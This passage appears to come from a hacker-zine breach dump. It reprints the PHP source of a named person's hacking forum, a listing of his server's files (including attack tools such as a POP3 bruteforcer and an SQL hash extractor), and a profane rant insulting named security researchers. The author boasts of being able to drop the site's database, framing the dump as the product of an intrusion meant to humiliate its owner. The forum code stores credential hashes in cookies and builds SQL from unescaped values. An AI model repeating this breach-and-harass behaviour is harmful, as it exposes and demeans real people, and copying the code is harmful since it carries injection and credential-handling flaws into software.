	  <div id="smile"></div><textarea name="posting" id="xx"
style="width:99%;height:150px;color:#fffff;padding:3px;"></textarea>
	  <br />
	  <input type="submit" name="submit" value="post topic"
style="color:#fffff;" /><br />
<br />
	</div></td>
    </tr>
  </table>
</form>
<?
} else { echo "<br><br><div class=\"green\">(!) please login to post a new
topic.</div>"; }

}

if($_REQUEST['topic'] && $_REQUEST['name'] && $_REQUEST['posting'] &&
$_COOKIE['guid']) {

    $item = explode('|',$_REQUEST['topic']);
    $id = (int) $item[1];
    $name = $_REQUEST['name'];
    $post = $_REQUEST['posting'];
    
    $run = explode(',',$_COOKIE['guid']);
    $p = prepare($run[2],250,true,false,true);
	$u = prepare($run[1],150,true,false,true);
	$sql = mysql_query("select * from users where user = '".$u."' and pass
= '".$p."'");
	
	if(mysql_num_rows($sql) >0) {
	    session_start();
	    $_SESSION['login'] = 1;
	    while($m=mysql_fetch_array($sql)) {
	    $username = encode($m['user']);
	    $uid = (int) $m['id'];
	    flood2($id,$uid);
	    }
	    
    $sqlo = mysql_query("insert into topics set catid = '".$id."', 
    name = '".prepare(encode($name),100,true,false,true)."', 
    post = '".prepare(encode($post),5001,true,false,true)."',
    uid = '".$uid."', user = '".$username."', time = '". date("F j, Y, g:i
a",time()) ."', timer = '".time()."'") or die();
	    
    $num = mysql_query("select * from topics");
    $last = mysql_num_rows($num);
    $nn = "|".$last.":".$id;
    $s = mysql_query("update users set unreadtopic =
CONCAT(unreadtopic,'".$nn."') ");
	    
    echo "<a href=\"index.php?!=1&f=0x0|".$id."\"><div class=\"green\">Posted!
return to the forum click here</div></a><br><br>";
    } else {
    echo 'error';
    }
}

if($_REQUEST['logout'] && $_COOKIE['guid'] && $_COOKIE['forum']) {

	setcookie('forum','',1);
	setcookie('guid','',1);
	session_destroy();
	echo "<br><br><a href=\"index.php?!=1\"><div class=\"green\">You are
logged out, go to forum</div></a><br><br>";
	header("location:index.php?!=1");
	exit;
}


if($_REQUEST['markread'] && $_COOKIE['guid'] && $_COOKIE['forum']) {

$dats = explode(',',$_COOKIE['guid']);

    $sql = mysql_query("update users set unreadtopic = '0:0' where user =
'".prepare($dats[1],150,true,false,true)."' 
    and pass = '".prepare($dats[2],250,true,false,true)."' limit 1");
    echo "<br><br><a href=\"index.php?!=1\"><div class=\"green\">All messages
are marked.</div></a><br><br>";
    header("location:index.php?!=1");
    exit;

}
    $cookie = $_COOKIE['forum'];
    $key    = $_SESSION['forum'];
    $body   = $_REQUEST['reply'];
    $post   = $_REQUEST['post'];
# check behaviour.
if($key && $cookie && $body && $post && $_REQUEST['!']==1) {

    if($key !== $cookie) {
	echo "<div class=\"green\">Session error, quit trying and
abort.</div>";
	setcookie('forum','',1);
	session_destroy();
	exit;
	}
elseif(preg_match("/(poker|blackjack|viagra|adult|dating|singles|v1agra|erotic|
pills|levitra|lolita|phentermine|zyban|valtex|xenical|adipex|celebrex|diflucan|
norvasc|pharmacy|drugstore|meridia|cunt|mortgage|credit|loan|finance|cash|boob|
enlarge|insurance|debt|casino|prozac|zoloft|masculine|xanax|valium|hydrocodone|
vicodin|paxil|vioxx)/i", $body)){
	echo "<div class=\"green\">(!) Message contains probably SPAM, please
review and correct.</div><br><br>";
	setcookie('forum','',1);
	session_destroy(); 
	exit;
	
	} elseif(strlen($body) > 5000) { 
	
	echo "<div class=\"green\">(!) Message is too large, maxlength is 5000
chars!</div><br><br>"; 
	
	} else {
	
	$pid = explode('|',$_REQUEST['post']);
	
	    $id = (int)$pid[1];
	    $sid = (int)$pid[2];
	    
	    $dats = explode(',',$_COOKIE['guid']);
	    
	    if(!$dats[1]) {
	    echo '<div class=\"green\">(!) Cookie problem, please logout and
re-login to fix this issue.</div><br><br>';
	    exit;
	    }
	    
    $sql2 = mysql_query("select * from users where user =
'".prepare($dats[1],150,true,false,true)."' 
    and pass = '".prepare($dats[2],250,true,false,true)."' limit 1");
    
    if(mysql_num_rows($sql2) >0 ) {

    while($y = mysql_fetch_array($sql2)) {
    
    flood($sid,$y['id']);
    
    $sqlp = mysql_query("update topics set posts = (posts +1) , lastuser =
'".$y['user']."' where id = '".$id."'");
    $sqln = mysql_query("insert into posts set catid = '".$id."', userid =
'".$y['id']."', 
    post = '".prepare(encode($body),5001,true,false,true)."', 
    time = '". date("F j, Y, g:i a",time()) ."', 
    ip = '".encode($_SERVER['REMOTE_ADDR'])."', 
    sid = '".$sid."', timer = '".time()."'");
    
    $num2 = mysql_query("select * from posts");
    $last2 = mysql_num_rows($num2);
    $nn = '|'.$id.':'.$sid;
    $f = mysql_query("update users set unreadtopic =
CONCAT(unreadtopic,'".$nn."')");
	echo "<div class=\"green\">Message posted!</div><br><br>";
	check();
	header("location:index.php?!=1&read=".$id.'|'.$sid."");
	setcookie('forum','',1);
	exit;
	}
    } else { 
    
	echo "<div class=\"green\">(!) Auth problem, are you a member? please
re-login to fix it.</div><br><br>"; 
    
	setcookie('forum','',1);
	setcookie('guid','',1);
	header("location:index.php?!=1");
	session_destroy();
	exit;
    }
}
	
}

$_SESSION['forum'] = crypt(sha1(hex(unique())));
?>
<script language="JavaScript" type="text/javascript">
function y(n,v) {
    var date = new Date();
    date.setTime(date.getTime()+(1*24*60*60*1000));
    var expires = "; expires="+date.toGMTString();
    document.cookie = n+"="+v+expires+"; path=/;";
}
    // set cookie
    y('forum','<?=$_SESSION['forum'];?>');

</script>
<noscript>
Javascript needs to be enabled to use the forum, cuz it sets the cookie!
</noscript>
<div class="pre">
  <?
    if($_REQUEST['login'] && $_REQUEST['user'] && $_REQUEST['pass']) {
	
    if(eregi('[^a-z0-9_]', $_REQUEST['user'])) {
	echo "<div class=\"green\">(!) Only a-z-0-9 chars as username</div>";
	exit;
    }
    
	$p = prepare($_REQUEST['pass'],250,true,false,true);
	$u = prepare($_REQUEST['user'],150,true,false,true);
	$sql = mysql_query("select * from users where user = '".$u."' and pass
= '".sha1($p)."'");
	
	    if(mysql_num_rows($sql) >0) {
	    session_start();
	    $_SESSION['login'] = 1;
	    while($m=mysql_fetch_array($sql)) {
	    $_SESSION['username'] = encode($m['user']);
	    ?>
  <script>
	y('guid','<?= unique().','.$_SESSION['username'].','.sha1($p);?>');
	</script>
  <?
	    }
	echo "<a href=\"index.php?!=1\"><div class=\"green\">(!) continue to
forum, click here.</div></a>";
	} else {
	echo '<div class=\"green\">(!) Ooooops! I guess that login doesn\'t
work.</div><br><br>';
	}

    } elseif($_REQUEST['f']) {
    
    $cid = explode('|',$_REQUEST['f'],7);
    $id = (int) $cid[1];
 
if($_SESSION['login']) { 
?>
  <table width="100%" border="0" cellspacing="1" cellpadding="3"  >
    <tr>
      <td class="cb">
	  <div align="right"><a
href="index.php?!=1&newtopic=<?=hex(unique());?>|<?=$id;?>">new topic</a> |
<a href="index.php?!=1&members=true">members</a> | <a
href="index.php?!=1&settings=<?=hex(unique());?>">settings</a> | <a
href="index.php?!=1&markread=<?=hex(unique());?>">mark all read</a> | <a
href="index.php?!=1&logout=<?=hex(unique());?>">logout</a></div>
      </td>
    </tr>
  </table>
  <?
}
?>
  <br />
  <a href="index.php?!=1" class="fa">&laquo; back to forum list</a><br />
  <br />
  <table width="100%" border="0" cellspacing="1" cellpadding="2">
    <tr>
      <td width="43%" class="cb">Subject </td>
      <td width="6%" class="cb">Posts </td>
      <td width="7%" class="cb">By </td>
      <td width="44%" class="cb">Last Post </td>
    </tr>
    <?
  
  $sql = mysql_query("select * from topics where catid = '".$id."' order by id
DESC");
  while($r=mysql_fetch_array($sql)) {
      $pre = mysql_query("select count(*) from posts where catid =
'".$r['id']."'");
	  while($w=mysql_fetch_array($pre)) {
	      $lstid = $w['count(*)'];
	
		$query = mysql_query("select time from posts where catid =
'".$r['id']."' order by id DESC limit 1");
		while($a=mysql_fetch_array($query)) {
	
		$times = $a['time'];
	
	}
	
	$sqlx = mysql_query("select unreadtopic from users where user =
'".$_SESSION['username']."'");
	while($a= mysql_fetch_array($sqlx)){
	$t = $r['id'].':'.$id;
	    if(strstr($a['unreadtopic'],$t)) {
	    $new = '<span class="new">(new)</span>';
	    } else {
	    $new = "";
	}
	}
  ?>
    <tr>
      <td class="cb" ><a href="index.php?!=1&read=<?=$r['id'];?>|<?=$id;?>"
class="fa">
	<?=stripslashes($r['name']);?>	<?=$new;?>
      </a></td>
      <td  class="cb"><div align="center" class="fa">
	  <? if($lstid) { echo $lstid; } else { echo '1'; } ?>
	</div></td>
      <td class="cb" ><?=$r['user'];?></td>
      <td class="cb"><a
href="index.php?!=1&read=<?=$r['id'];?>|<?=$id;?>#m<?=encode($lstid);?>"
class="smaller"><? if($r['lastuser']) { echo $r['lastuser'].' - '. $times;  }
else { } ?>
      </a></td>
    </tr>
    <?
  }
  }
  ?>
  </table>
  <?
    } elseif($_REQUEST['read']) {
    
    $tmp = explode('|',$_REQUEST['read'],7);
    
	$id = (int) $tmp[0];
	$catid = (int) $tmp[1];
	
	$t = '|'.$id.':'.$catid;
	$sq = mysql_query("update users set unreadtopic =
replace(unreadtopic,'".$t."','') where user = '".$_SESSION['username']."' ");
    
	
?>
  <a href="index.php?!=1&f=0x0|<?=$catid;?>"  class="fa">&laquo; back to
forum list</a><br />
  <br />
  <table width="100%" border="0" cellspacing="1" cellpadding="7">
    <?
    $sqlp = mysql_query("update topics set views = (views +1) where catid =
'".$catid ."'");
    $sql = mysql_query("select * from topics where id = '".$id."' limit 1");
    
      while($r=mysql_fetch_array($sql)) {    
	
	$sqlcnt = mysql_query("select * from posts where userid =
'".$r['uid']."'");
	    
	$pre = mysql_query("select * from users where id = '".$r['uid']."'");
	  while($s=mysql_fetch_array($pre)) {	 
	
    
	$ut = $s['user'];
	$avx = $s['avatar'];
	$avz = preg_replace("/..\//",'	  ',$avx);
       
if(preg_match("/(\.php|\.js|\.html|\.asp|http|www|wtf|\.com|\-|\_|\+|\=|script|
>|<|\'|\"|java|xss|%3C|%3E)/i", $avz)){
	$av =  'hacked.gif';
	} elseif (file_exists('avatars/'.escapeshellcmd($avz))) {
	   $av =  $avz;
	} else {
	$av =  'hacked.gif';
	}
	

    
?>
    <tr>
      <td colspan="3" bgcolor="#f7f7f7" class="cb"><h2>
	  <?=stripslashes($r['name']);?>
	</h2>
	<a href="<?=encode($s['link']);?>" class="fa">Started by:
	<?=$ut;?>
	<? if($s['company']) {echo '('.$s['company'].')'; } else {}; ?>
	on:
	<?=$r['time'];?>
	<br />
      </a></td>
    </tr>
    <tr>
      <td width="70"  valign="top" bgcolor="#ffffff" class="cb"><? 
    }
    if($av) { 
    echo  "<img src=http://www.0x000000.com/avatars/".$av." width=\"70\"
height=\"70\" border=\"0\">"; 
    } else { 
    echo "<img src=\"no.gif\" width=\"70\" border=\"0\">"; 
    } 
    ?>	    </td>
      <td bgcolor="#ffffff" class="cb" ><div class="hack">
	  <? 
    $dat = nl2br(stripslashes($r['post'])); 
    echo wrap(rplace($dat));
    ?>
	  <? 
    if($s['sig']) {
      $dz = nl2br(stripslashes($s['sig'])); 
      echo '<div class="sig">'. rplace(stripslashes($dz)) .'</div>';
      }
    ?>
      </div></td>
    </tr>
    <?
    }
    $sql = mysql_query("select * from posts where catid = '".$id."' order by id
ASC");
      while($r=mysql_fetch_array($sql)) {    
    
    $sqlcnt2 = mysql_query("select * from posts where userid =
'".$r['userid']."'");
	$pre = mysql_query("select * from users where id = '".$r['userid']."'
limit 1");
	  while($s=mysql_fetch_array($pre)) {	 
	
	$ut = $s['user'];
	$avx = $s['avatar'];
	$avz = preg_replace("/..\//",'	  ',$avx);
       
if(preg_match("/(\.php|\.js|\.html|\.asp|http|www|wtf|\.com|\-|\_|\+|\=|script|
>|<|\'|\"|java|xss|%3C|%3E)/i", $avz)){
	$av =  'hacked.gif';
	} elseif (file_exists('avatars/'.$avx)) {
	   $av =  $avz;
	} else {
	$av =  'hacked.gif';
	}
    ?>
    <tr>
      <td colspan="2" bgcolor="#f7f7f7" valign="bottom"><br /></td>
    </tr>
    <tr>
      <td rowspan="2"  valign="top" bgcolor="#ffffff" class="cb"><?	    
    if($av) { 
	echo  "<img src=http://www.0x000000.com/avatars/".$av." width=\"70\"
height=\"70\" border=\"0\">"; 
	} else { echo "<img src=\"no.gif\" width=\"70\" border=\"0\">"; 
	} 
	
	
    ?></td>
      <td valign="top" bgcolor="#ffffff" class="cb">
  
      
      <div style="color:#999999;"><?=$ut;?><? if($s['company']) {echo
'('.$s['company'].')'; } else {}; ?>
	on:<?=$r['time'];?></div>
      </td>
    </tr>
    <tr>
      <td valign="top" bgcolor="#ffffff" class="cb">	  <div class="hack">
	  <? 
      $dat = nl2br(stripslashes($r['post'])); 
      echo wrap(rplace($dat));
    ?>
	  <? 
    if($s['sig']) {
      $dz = nl2br(stripslashes($s['sig'])); 
      echo '<div class="sig">'. rplace(stripslashes($dz)) .'</div>';
      }
    ?>
      </div></td>
    </tr>
    <?
     }
    }
    ?>
  </table>
  <?
    if($_SESSION['login']) {
    ?>
  <br />

  <form
action="index.php?!=1&post=<?=hex(unique());?>|<?=$id;?>|<?=$catid;?>"
method="post" name="reply" id="reply">
    <table width="100%" border="0" cellspacing="1" cellpadding="3"  >
      <tr>
	<td class="cb"><strong>Reply</strong></td>
      </tr>
      <tr>
	<td class="cb"><div align="right">bbcode: [url=url]text[/url] - [b][/b]
[i][/i] [u][/u] [s][/s] [hr] [code][/code] [sub][/sub]
	<div id="smile"></div>
	    <textarea name="reply" id="xx"
style="width:99%;height:150px;color:#fffff;padding:3px;"></textarea>
	    <br />
	    <input type="submit" name="submit" value="post reply"
style="color:#fffff;" />
	  </div></td>
      </tr>
    </table>
  </form>
  <?
    } else { 
    echo "<br><br><div class=\"green\">(!) please login to post.</div>"; 
    }
    } else {
    
    function NT($num) {
    $sql = mysql_query("select * from topics where catid = '".$num."'");
    return mysql_num_rows($sql);
    }
    
    function PT($num) {
    $sql = mysql_query("select * from posts where sid = '".$num."'");
	if(mysql_num_rows($sql) >0) {
	$cf =  (mysql_num_rows($sql) + 1);
	} else {
	    $cf = '0';
	}
    return $cf;
    }
    
    function posts($num) {
    $n = ':'.$num;
    $sqlx = mysql_query("select * from users where unreadtopic LIKE '%".$n."'
and user = '".$_SESSION['username']."'");
	while($a= mysql_fetch_array($sqlx)){
	    echo '<span class="new">(new)</span>';
	}
    }
    # init session
    $_SESSION['gid'] = hex(unique());
    $guid = $_SESSION['gid'];
    ?>
  <? 
    if($_SESSION['login']) { 
    ?>
  <table width="100%" border="0" cellspacing="1" cellpadding="3"  >
    <tr>
      <td width="30%"></td>
      <td width="70%"><div align="right"><a
href="index.php?!=1&members=true">members</a> | <a
href="index.php?!=1&settings=<?=hex(unique());?>">settings</a> | <a
href="index.php?!=1&markread=<?=hex(unique());?>">mark all read</a> | <a
href="index.php?!=1&logout=<?=hex(unique());?>">logout</a></div></td>
    </tr>
  </table>
  <?
}
?>
  <br />
  <table width="100%" border="0" cellspacing="1" cellpadding="3" >
    <tr>
      <td width="30%" class="cb"><h2>FORUM</h2></td>
      <td width="49%" class="cb"><div align="center">
	  <? 
    if($_SESSION['login']) { 
    echo 'Welcome ' . $_SESSION['username']; 
    } else { 
    ?>
	  <form action="index.php?!=1&login=true" method="post"
name="login" id="login">
	    <input type="text" name="user" class="ll" size="12"/>
	    <input type="password" name="pass" class="ll" size="12"/>
	    <input type="submit" name="submit" value="login" class="ll"/>
	  </form>
	  <?  
    } 
    ?>
	</div>
      </td>
      <td width="11%" class="cb">Threads</td>
      <td width="10%" class="cb">Posts</td>
    </tr>
  </table>
  <br />
  <table width="100%" border="0" cellspacing="1" cellpadding="7"  >
    <tr>
      <td width="79%" valign="top" class="cb" ><a
href="index.php?!=1&f=<?=$guid;?>|1" class="f">General hacking</a> <?=
posts(1);?><br />
	<div class="g">Everything that applies to hacking</div> </td>
      <td width="11%" valign="top" class="cb"  ><div align="center">
	  <?= NT(1);?>
	</div></td>
      <td width="10%" valign="top" class="cb"  ><div align="center">
	  <?= PT(1);?>
	</div></td>
    </tr>
    <tr>
      <td valign="top" class="cb"  ><a href="index.php?!=1&f=<?=$guid;?>|2"
class="f">News</a> <?= posts(2);?><br />
	<div class="g">Important news about hacking or security.</div></td>
      <td valign="top" class="cb"  ><div align="center">
	  <?= NT(2);?>
	</div></td>
      <td valign="top" class="cb"  ><div align="center">
	  <?= PT(2);?>
	</div></td>
    </tr>
    <tr>
      <td valign="top" class="cb"  ><a href="index.php?!=1&f=<?=$guid;?>|3"
class="f">Webapplication hacking</a> <?= posts(3);?><br />
	<div class="g">Everything webapplication, hacking websites, apps and
more...</div></td>
      <td valign="top" class="cb"  ><div align="center">
	  <?= NT(3);?>
	</div></td>
      <td valign="top" class="cb"  ><div align="center">
	  <?= PT(3);?>
	</div></td>
    </tr>
    <tr>
      <td valign="top" class="cb"  ><a href="index.php?!=1&f=<?=$guid;?>|4"
class="f">Network hacking</a> <?= posts(4);?><br />
    <div class="g">Strictly hardcore network.</div></td>
      <td valign="top" class="cb"  ><div align="center">
	  <?= NT(4);?>
	</div></td>
      <td valign="top" class="cb"  ><div align="center">
	  <?= PT(4);?>
	</div></td>
    </tr>
    <tr>
      <td valign="top" class="cb"  ><a href="index.php?!=1&f=<?=$guid;?>|5"
class="f">SQL Injection</a> <?= posts(5);?><br />
	 <div class="g">Vectors, questions and answers about SQL
injection.</div></td>
      <td valign="top" class="cb"  ><div align="center">
	  <?= NT(5);?>
	</div></td>
      <td valign="top" class="cb"  ><div align="center">
	  <?= PT(5);?>
	</div></td>
    </tr>
    <tr>
      <td valign="top" class="cb"  ><a href="index.php?!=1&f=<?=$guid;?>|6"
class="f">XSS</a> <?= posts(6);?><br />
	 <div class="g">Vectors, questions and answers about cross site
scripting.</div></td>
      <td valign="top" class="cb"  ><div align="center">
	  <?= NT(6);?>
	</div></td>
      <td valign="top" class="cb"  ><div align="center">
	  <?= PT(6);?>
	</div></td>
    </tr>
    <tr>
      <td valign="top" class="cb"  ><a href="index.php?!=1&f=<?=$guid;?>|7"
class="f">CSRF</a> <?= posts(7);?><br />
	<div class="g">Unauthorized requests, CSRF, and general sea
surfing.</div></td>
      <td valign="top" class="cb"  ><div align="center">
	  <?= NT(7);?>
	</div></td>
      <td valign="top" class="cb"  ><div align="center">
	  <?= PT(7);?>
	</div></td>
    </tr>
    <tr>
      <td valign="top" class="cb"  ><a href="index.php?!=1&f=<?=$guid;?>|8"
class="f">Browser hacking</a> <?= posts(8);?><br />
	<div class="g">Hacking browsers, destroying browsers, and other browser
mayhem.</div></td>
      <td valign="top" class="cb"  ><div align="center">
	  <?= NT(8);?>
	</div></td>
      <td valign="top" class="cb"  ><div align="center">
	  <?= PT(8);?>
	</div></td>
    </tr>
    <tr>
      <td valign="top" class="cb"  ><a href="index.php?!=1&f=<?=$guid;?>|9"
class="f">Lifestyle</a> <?= posts(9);?><br />
	<div class="g">The hacker lifestyle, mind hacking, the way of
life.</div></td>
      <td valign="top" class="cb"  ><div align="center">
	  <?= NT(9);?>
	</div></td>
      <td valign="top" class="cb"  ><div align="center">
	  <?= PT(9);?>
	</div></td>
    </tr>
    <tr>
      <td valign="top" class="cb"  ><a
href="index.php?!=1&f=<?=$guid;?>|10" class="f">Software hacking</a> <?=
posts(10);?><br />
	 <div class="g">Got some cool software hacks? post them
here.</div></td>
      <td valign="top" class="cb"  ><div align="center">
	  <?= NT(10);?>
	</div></td>
      <td valign="top" class="cb"  ><div align="center">
	  <?= PT(10);?>
	</div></td>
    </tr>
    <tr>
      <td valign="top" class="cb"  ><a
href="index.php?!=1&f=<?=$guid;?>|11" class="f">Hardware hacking</a> <?=
posts(11);?><br />
	 <div class="g">We hack, hack, hack. So also computers, and other
property.</div></td>
      <td valign="top" class="cb"  ><div align="center">
	  <?= NT(11);?>
	</div></td>
      <td valign="top" class="cb"  ><div align="center">
	  <?= PT(11);?>
	</div></td>
    </tr>
    <tr>
      <td valign="top" class="cb"  ><a
href="index.php?!=1&f=<?=$guid;?>|12" class="f">Chillin</a> <?=
posts(12);?><br />
	<div class="g">Just chill and relax a bit...</div></td>
      <td valign="top" class="cb"  ><div align="center">
	  <?= NT(12);?>
	</div></td>
      <td valign="top" class="cb"  ><div align="center">
	  <?= PT(12);?>
	</div></td>
    </tr>
    <tr>
      <td valign="top" class="cb"  ><a
href="index.php?!=1&f=<?=$guid;?>|13" class="f">Tutorials</a> <?=
posts(13);?><br />
	 <div class="g">Posted tutorials, links to them and Q &
A</div></td>
      <td valign="top" class="cb"  ><div align="center">
	  <?= NT(13);?>
	</div></td>
      <td valign="top" class="cb"  ><div align="center">
	  <?= PT(13);?>
	</div></td>
    </tr>
    <tr>
      <td valign="top" class="cb"  ><a
href="index.php?!=1&f=<?=$guid;?>|14" class="f">Trashbin</a> <?=
posts(14);?><br />
       <div class="g">Rubbish and spam.</div></td>
      <td valign="top" class="cb"  ><div align="center">
	  <?= NT(14);?>
	</div></td>
      <td valign="top" class="cb"  ><div align="center">
	  <?= PT(14);?>
	</div></td>
    </tr>
  </table>
  <br />
  <table width="100%" border="0" cellspacing="1" cellpadding="3"  class="silv">
    <tr>
      <td class="cb"><div align="right"><a href="?!=5" class="f"
target="_blank">Register</a></div></td>
    </tr>
  </table>
  <?
}
?>
</div>

Casual file listing...

-rwx------  1 ronald ronald    2629 2009-01-23 17:21 125x125freexssa.gif
-rwx------  1 ronald ronald    2250 2009-01-23 17:21 1338.gif
-rwx------  1 ronald ronald    1645 2009-01-23 17:22 about.php
-rwx------  1 ronald ronald    4374 2009-01-23 17:22 archive.php
-rwx------  1 ronald ronald    4849 2009-01-23 17:21 arioso.js
-rwx------  1 ronald ronald   15616 2009-01-23 17:21 ascii.html
drwx------  2 ronald ronald   65536 2009-01-23 17:22 avatars
drwx------  2 ronald ronald    8192 2009-01-23 17:22 cache
-rwx------  1 ronald ronald    3957 2009-01-23 17:21 cap.php
-rwx------  1 ronald ronald	561 2009-01-23 17:22 contact.php
drwx------  2 ronald ronald    8192 2009-01-23 17:21 css
-rwx------  1 ronald ronald	209 2009-01-23 17:21 dx.php
-rwx------  1 ronald ronald    2515 2009-01-23 17:21 err.php
-rwx------  1 ronald ronald	118 2009-01-23 17:21 favicon.ico
-rwx------  1 ronald ronald	197 2009-01-23 17:21 fav.php
-rwx------  1 ronald ronald   34228 2009-01-23 17:21 forumasas.php
-rwx------  1 ronald ronald    7988 2009-01-23 17:21 fuzzy_overdrive.txt
-rwx------  1 ronald ronald	712 2009-01-23 17:21 google.php
-rwx------  1 ronald ronald    4889 2009-01-23 17:21 Hostscanner.phps
-rwx------  1 ronald ronald    1513 2009-01-23 17:21 .htaccess
-rwx------  1 ronald ronald 1412557 2009-01-23 17:21 icon.txt
drwx------  3 ronald ronald   16384 2009-01-23 17:22 images
drwx------  2 ronald ronald    8192 2009-01-23 17:22 include
-rwx------  1 ronald ronald    5739 2009-01-23 17:21 index2sssdsdw.php
-rwx------  1 ronald ronald    4194 2009-01-23 17:21 index.php
-rwx------  1 ronald ronald    6204 2009-01-23 17:21 index_pig.php
drwx------  2 ronald ronald    8192 2009-01-23 17:21 js
-rwx------  1 ronald ronald    5333 2009-01-23 17:21 linkdumpssdsw.php
-rwx------  1 ronald ronald	570 2009-01-23 17:21 log.html
-rwx------  1 ronald ronald    4631 2009-01-23 17:22 logo.gif
-rwx------  1 ronald ronald    3449 2009-01-23 17:22 logo_over.gif
-rwx------  1 ronald ronald    7612 2009-01-23 17:21 logo.png
-rwx------  1 ronald ronald    1712 2009-01-23 17:21 no.gif
-rwx------  1 ronald ronald   77020 2009-01-23 17:21 NYF.jpg
drwx------  3 ronald ronald    8192 2009-01-23 17:21 od
-rwx------  1 ronald ronald    1189 2009-01-23 17:21 phpPOP3bruteforcer.phps
-rwx------  1 ronald ronald    1223 2009-01-23 17:21 phpTORwrapper.phps
drwx------  2 ronald ronald    8192 2009-01-23 17:21 plesk-stat
-rwx------  1 ronald ronald    8641 2009-01-23 17:21 plopper.gif
-rwx------  1 ronald ronald    9298 2009-01-23 17:21 plopper.rar
-rwx------  1 ronald ronald    4326 2009-01-23 17:21 registersddsw.php
-rwx------  1 ronald ronald    2192 2009-01-23 17:21
remoteSQLhashExtracter.phps
-rwx------  1 ronald ronald	  0 2009-01-23 17:22 robots.txt
-rwx------  1 ronald ronald	774 2009-01-23 17:21 rss.php
-rwx------  1 ronald ronald   12994 2009-01-23 17:21 secure_coding_map.png
drwx------  2 ronald ronald    8192 2009-01-23 17:21 smiles
-rwx------  1 ronald ronald    6767 2009-01-23 17:22 sn00per.phps
-rwx------  1 ronald ronald	204 2009-01-23 17:21 sop2.html
-rwx------  1 ronald ronald    1036 2009-01-23 17:21 sop.html
-rwx------  1 ronald ronald    2001 2009-01-23 17:22 stats.php
-rwx------  1 ronald ronald	989 2009-01-23 17:21 style.css
-rwx------  1 ronald ronald   74209 2009-01-23 17:22 suigenchi.rar
-rwx------  1 ronald ronald   14709 2009-01-23 17:21 thw.gif
-rwx------  1 ronald ronald    2035 2009-01-23 17:22 tools.php
-rwx------  1 ronald ronald   39048 2009-01-23 17:22 TorSniff.phps
drwx------  3 ronald ronald    8192 2009-01-23 17:22 webappsec
drwx------  2 ronald ronald    8192 2009-07-15 12:27 x

Again, we could drop the database and users but there is no need, this is old
material but fun material :)

Ronald said he'd had enough of security a while back, he had many wannabes who
worshipped him. He probably got to the stage at which he realised that what he
did does not require much intelligence. When you realise that and you have
people worshipping you - you get to wondering how dumb some of these people
are, and hence the security industry is. Ronald got to that point despite
lacking much security talent himself (see above) and focusing on just web
security. Credit to you for sticking to your guns and walking away Ronald, one
thing is for sure, there is more class in your slightly stretched (im sure)
dutch asshole than there is in Jeremiah Grossman and rsnake's brains.



                                           |
                                       \       /            _\/_
     Industry check                      .-'-.              //o\  _\/_
                                    --  /     \  --           |   /o\\
  ^^~^~^~^~^~^~^~^~~^~^~^~^~^~^~^~^~^~^-=======-~^~~^^~~^~^~^~|~~^~^|^~`
     We don't talk to police                                        |
       We don't make a peace bond

The security scene is fucked. You have Dan Kaminsky lecturing you on how DNS
poisoning will destroy life as we know it. You have Matasano harvesting talent
and critiquing everyone, and then Ptacek can only announce the release of....a
graphical firewall management client.  There's kingcope killing bugs and
dropping weaponized exploits while making no other contribution except putting
a smile on the face of kiddies. There's iDefense and their competitors selling
exploits and only doing research in how to make more exploits. There's Jeff
Moss running a conference under the hideous misnomer "Blackhat Briefings" where
the same researchers search for glory and present the same shit year after
year. There are people who just live press release by press release. And on top
of it all, somehow you STILL have not got rid of Kevin Mitnick. The industry
cares about virtualization one year and iPhones the next, every year forgetting
the lessons it should have picked up in the last. 

If you are just someone looking to pay a fair price to not get owned, you find
out quickly that none of these people exist to help you.  Very few people in
this industry have their income model based around actually making you more
secure. At best, some of them have it based around convincing you that you are
better off.
 
The very concept of "penetration testing" is fundamentally flawed.  The problem
with it is that the penetration tester has a limited set of targets they're
allowed to attack, while a real attacker can attack anything in order to gain
access to the site/box.  So if a site on a shared host is being tested, just
because site1.com is "secure" that does NOT in anyway mean that the server is
secure, because site2.com could easily be vulnerable to all sorts of simple
attacks.  The time constraint is another problem. A professional pentester with
a week or two to spend on a client's network may or may not get into
everything.  A real dedicated hacker making the slog who spends a month of
eight hour days WILL get into anything they target. You're lucky if it even
takes him that long, really.

Those things should all be very obvious, but whitehats still make the mistake
of discounting them. Look at Mitnick. Every time he gets owned he blames his
host or his DNS provider. If he's getting owned through them, that's still his
fault. Choosing a host is a security decision, it's just like choosing a
password. If you choose a weak one you expose yourself.  It's still your fault.

It's the same with outsourcing the development of your security-critical code.
Mitnick could get someone else to make him a flashy website, and then blame
them when it is full of file include vulnerabilities. People do this all the
time, indirectly, by using ridiculous CMS or blog software. As an easy example,
look at Wordpress. Even easier, look at Wordpress in 2007.  Horrid. When
considering Wordpress, a blackhat starts reading the PHP, shudders and giggles,
and then laughs at the idea of ever using it on one of their servers. A
whitehat never gets that far apparently, they just install it and get owned. I
simply fail to see how leading security researchers run all kinds of code that
is blatantly dangerous. Are they really that bad at reading code? Or do they
just not care much if their passwords end up on Full Disclosure? If it's the
second option, why is that?  Why can these people make a living selling
security when they make such bad choices? How do they maintain legitimacy? They
take less responsibility for getting owned than do the people who they sell
services to.  

There's a popular term for people who don't read code. We call them script
kiddies. 

You cannot outsource blame. You HAVE to take responsibility for your mistakes,
whether they are mistakes in your code, mistakes in code you are using,
mistakes by your host, or mistakes in who you trust. These are all security
choices. Learn to control this shit. Learn how to read code. A lot of the time
it only takes a very shallow audit to realise that the code is crap and is
bound to have bugs. In a smarter world, security professionals get paid to stop
people from getting owned. End of. These is no limit to the scope of an audit. 

Are you professional types really this out of touch? I see all these papers
about how to protect yourself from these super-fucking-advanced techniques and
exploits that very few people can actually develop, and most hackers will NEVER
USE. It's the simple stuff that works now, and will continue to work years into
the future. Not only is it way easier to dev for simple mistakes, but they are
easier to find and are more plentiful. 
 
The whole concept of full-disclosure has backfired. It will never work. It's
some slashdot hippie pipe dream. Even you dumbass corporate types should
recognize this. If you're constantly giving away all the vulnerabilites you
find, for *FREE* mind you (and what other industry does that?), and the
vulnerabilites get harder and harder to find and exploit, it will get harder
and harder for you all to do your "job".  Frankly, I'm surprised that the
non-disclosure movement didn't start in the security industry in the first
place. In a way it did, by default.  With full-disclosure, the security
industry is all about show and gloat, it is not about fixing anything. A lot of
bugs have been fixed from it, but it comes with the price of an industry that
likes to cripple itself. Projects run by teams of trained monkeys are always
eager to add more bugs to replace those that have been fixed.

We hate the industry because it is full of shit. There are so many trolls like
Kaminsky who just desperately search for anything new, to get attention.  So
many talentless buffoons trying to scam the planet. A lot of the actual talent
out there is severely misapplied. It's an industry tied to news and not
results, because very few of you can even attain results. When you can't, who's
the wiser? Your customers can hardly tell if you have really made them more
